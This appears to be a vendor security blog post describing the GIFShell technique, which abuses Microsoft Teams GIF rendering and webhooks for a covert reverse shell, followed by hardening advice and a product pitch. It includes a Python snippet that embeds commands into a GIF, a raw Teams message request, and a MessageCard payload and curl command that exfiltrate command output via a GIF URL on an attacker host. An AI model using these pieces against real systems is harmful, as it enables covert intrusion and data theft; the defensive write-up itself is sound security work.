“GIFShell” — Covert Attack Chain and C2 Utilizing Microsoft Teams GIFs

Organizations and cyber security teams work to secure themselves from vulnerabilities and have an inclination to neglect the risks that may come from their SaaS apps. The newly released GIFShell attack method, which leverages Microsoft Teams, is a prime example of how threat actors can exploit legitimate features and configurations that haven't been correctly set. This piece will examine what the method entails and the steps you can take to counter it.

Seven different insecure design elements/vulnerabilities present in Microsoft Teams, can be leveraged by an attacker, to execute a reverse shell between an attacker and victim, where no communication is directly exchanged between an attacker and a victim but is entirely piped through malicious GIFs sent in Teams messages, and Out of Bounds (OOB) lookups of GIFs conducted by Microsoft’s own servers. This unique C2 infrastructure can be leveraged by sophisticated threat actors to avoid detection by EDR and other network monitoring tools. Particularly in secure network environments, where Microsoft Teams might be one of a handful of allowed, trusted hosts and programs, this attack chain can be particularly devastating.

How does it work?

• To create this reverse shell, an attacker must first compromise a computer to plant the malware — which means the bad actor needs to convince the user to install a malicious stager, like with phishing, that executes commands and uploads command output via a GIF URL to a Microsoft Teams webhook.
• Once the stager is in place, the threat actor creates their own Microsoft Teams tenant and contacts other Microsoft Teams users outside of the organization.
• The threat actor can then use a GIFShell Python script to send a message to a Microsoft Teams user that contains a specially crafted GIF. This legitimate GIF image has been modified to include commands to execute on a target's machine.
• When the target receives the message, the message and the GIF will be stored in Microsoft Team's logs. Important to note: Microsoft Teams runs as a background process, so the GIF does not even need to be opened by the user to receive the attacker's commands to execute.
• The stager monitors the Teams logs and when it finds a GIF, it extracts and runs the commands.
• Microsoft's servers will connect back to the attacker's server URL to retrieve the GIF, which is named using the base64 encoded output of the executed command.
• The GIFShell server running on the attacker's server will receive this request and automatically decode the data allowing the attackers to see the output of the command run on the victim's device.

Insecure Design Elements/Vulnerabilities:

There are seven separate insecure design elements/vulnerabilities which allow for the GIFShell attack chain to occur:

1. When a new tenant is created in Microsoft, Microsoft Teams by default allows for all external senders to send messages to users within that tenant. Many organization admins likely are not even aware, that their organization allows for External Teams collaboration.

2. Microsoft Teams messages are stored in plain text, within the low-privileged user’s file directory, which allows for a simply staged payload to constantly scan for new content appended to the logs from Microsoft Teams messages being received.

Microsoft Team’s (Work or School Version) Log Location:

$HOME\AppData\Roaming\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb\*.log        

3. Reading plain text Teams log files does not require administrator or elevated privileges, which allows for the stager to run and scan the log files.

4. Microsoft Teams attempts to render GIFs included in Microsoft Teams Cards, on behalf of the end user. This allows for Out of Bounds HTTP and DNS requests to be sent from Microsoft infrastructure, attempting to fetch GIFs included in Microsoft Teams Cards. The URL which carries out these lookups on behalf of the user is:

https://urlp.asm.skype.com/v1/url/content?url=<attacker-public-ip>/<exfiltrated-data>.gif        

5. The content of base64 encoded GIFs included in Microsoft Teams messages, are not scanned for malicious content, or bytes that are not actually part of the GIF header or image content.

Here is a Python snippet so you can try embedding malicious commands in a GIF yourself:

import base64
token = ""
def gif_embedder():
    my_str = ""
    my_str_as_bytes = str.encode("whoami;" + my_str)
    with open("giphy2.gif", "rb") as f:
       original =  (f.read())
    test = ''
    original2 = original + my_str_as_bytes
    base64_gif_encoded = base64.b64encode(original2)
    base64_gif_encoded = base64_gif_encoded.decode()
    print (base64_gif_encoded)
gif_embedder()        

6. Sending of Microsoft Teams messages to an individual, which is POST requests with JSON bodies, do not have any CSRF protections or rate limiting protections, which allows for an attacker to easily automate the sending of messages using the Python requests module, bypassing any restrictions put in place by the Microsoft Graph API, which is supposed to be the programmatic interface developers use to send Teams messages.

POST /v1/users/ME/conversations/19%3A307c579d-44ea-496c-981e-df92ebfdf9ab_9e02156d-981c-4a84-b2bf-0c5cc1382b8c%40unq.gbl.spaces/messages HTTP/2
Host: amer.ng.msg.teams.microsoft.com
Content-Length: 217
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
X-Ms-Session-Id: d8a5f3f3-10b5-2413-e7da-302dee811e82
Behavioroverride: redirectAs404
X-Ms-Scenario-Id: 5035
X-Ms-Client-Env: pds-prod-azsc-usea-01
X-Ms-Client-Type: web
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/json
Clientinfo: os=windows; osVer=10; proc=x86; lcid=en-us; deviceType=1; country=us; clientName=skypeteams; clientVer=1415/1.0.0.2022051616; utcOffset=-04:00; timezone=America/New_York
Accept: json
X-Ms-Client-Version: 1415/1.0.0.2022051616
X-Ms-User-Type: null
Authentication: skypetoken=<redacted>
Sec-Ch-Ua-Platform: "macOS"
Origin: https://teams.microsoft.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://teams.microsoft.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"content":"<p>Test message</p>","messagetype":"RichText/Html","contenttype":"text","amsreferences":[],"clientmessageid":"2298590383200541633","imdisplayname":"Chris Green","properties":{"importance":"","subject":""}}        

7. Sending of Microsoft Teams messages to a public webhook, are POST requests with JSON bodies, that require no authentication, have no CSRF protections, or rate limiting protections. This allows for simple data exfiltration via Teams Cards embedded with GIFs from the victim’s machine.

gifendpoint = https://<attacker-site>/<base64-encoded-command-output>.gif
json_payload = "{`n `"@type`": `"MessageCard`",`n `"@context`": `"https://schema.org/extensions`",`n `"summary`": `"2 new Yammer posts`",`n `"themeColor`": `"0078D7`",`n `"sections`": [`n  {`n   `"activityImage`":`""+ gifendpoint + "`",`n   `"activityTitle`": `"Chase Miller`",`n   `"activitySubtitle`": `"2 hours ago - 3 comments`",`n   `"facts`": [`n    {`n     `"name`": `"Keywords:`",`n     `"value`": `"Surface`"`n    },`n    {`n     `"name`": `"Group:`",`n     `"value`": `"Helpdesk Support`"`n    }`n   ],`n   `"text`": `"Can You Solve the Math Problem That Is Baffling the Internet? More than 530,000 people were commenting on one single Facebook picture. Are you smart enough to figure it out?`",`n   `"potentialAction`": [`n    {`n     `"@type`": `"OpenUri`",`n     `"name`": `"View conversation`"`n    }`n   ]`n  }`n  `n ]`n}"
curl -H 'Content-Type: application/json' -d json_payload <YOUR WEBHOOK URL>        

How to Protect Against the GIFShell Attack

There are security configurations within Microsoft that, if hardened, can help to prevent this type of attack.

• Disable External Access: Microsoft Teams, by default, allows for all external senders to send messages to users within that tenant. Many organization admins likely are not even aware that their organization allows for External Teams collaboration. You can harden these configurations:

Disable external domain access — Prevent people in your organization from finding, calling, chatting, and setting up meetings with people external to your organization in any domain. While not as seamless of a process as through Teams, this better protects the organization and is worth the extra effort.

Disable unmanaged external teams start conversation — Block Teams users in your organization from communicating with external Teams users whose accounts are not managed by an organization.

• Gain Device Inventory Insight:?You can ensure your entire organization's devices are fully compliant and secure by using your XDR / EDR / Vulnerability Management solution, like Crowdstrike or Tenable. Endpoint security tools are your first line of defense against the suspicious activity such as accessing the device's local teams log folder which is used for data exfiltration in GIFShell.

You can even go a step further and integrate an SSPM (SaaS Security Posture Management) solution, like Terraeagle, with your endpoint security tools to gain visibility and context to easily see and manage the risks that stem from these types of configurations, your SaaS users, and their associated devices.

How to Automate Protection Against These Attacks

There are two methods to combat misconfigurations and harden security settings: manual detection and remediation or an automated SaaS Security Posture Management (SSPM) solution. With the multitudes of configurations, users, devices, and new threats, the manual method is an unsustainable drain on resources, leaving security teams overwhelmed. However, an SSPM solution, such as Terraeagle, enables security teams to gain complete control over their SaaS apps and configurations. Terraeagle automates and streamlines the process of monitoring, detection, and remediation for SaaS misconfigurations, SaaS-to-SaaS access, SaaS-related IAM, and Device-to-SaaS user risk in compliance with both industry and company standards.